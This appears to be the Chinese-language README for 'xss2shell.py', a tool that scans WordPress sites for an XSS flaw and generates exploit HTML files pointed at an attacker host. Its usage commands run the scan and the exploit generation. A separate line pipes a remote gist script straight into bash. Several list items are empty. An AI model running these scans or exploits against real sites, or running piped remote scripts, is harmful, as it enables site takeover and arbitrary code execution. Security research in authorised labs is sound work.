通过 PayPal 或扫描下方二维码来支持本项目的维护。
请仅在安全且已获授权的环境中使用本项目,例如:
示例环境搭建:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
示例用法:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
注意:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 来清除嵌套目录中的 .git一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
本仓库仅用于教育和已获授权的安全研究。
它旨在帮助用户了解:
请仅在您拥有权限的环境中使用本仓库,例如:
严禁未经授权或非法的使用。
作者和贡献者不对因本项目造成的任何损害、误用、法律问题或损失负责。
使用本仓库即表示您同意:
本项目适用于:
请遵循负责任披露实践,并遵守所有适用法律。
如需负责任披露或合作,请通过 GitHub 联系仓库维护者。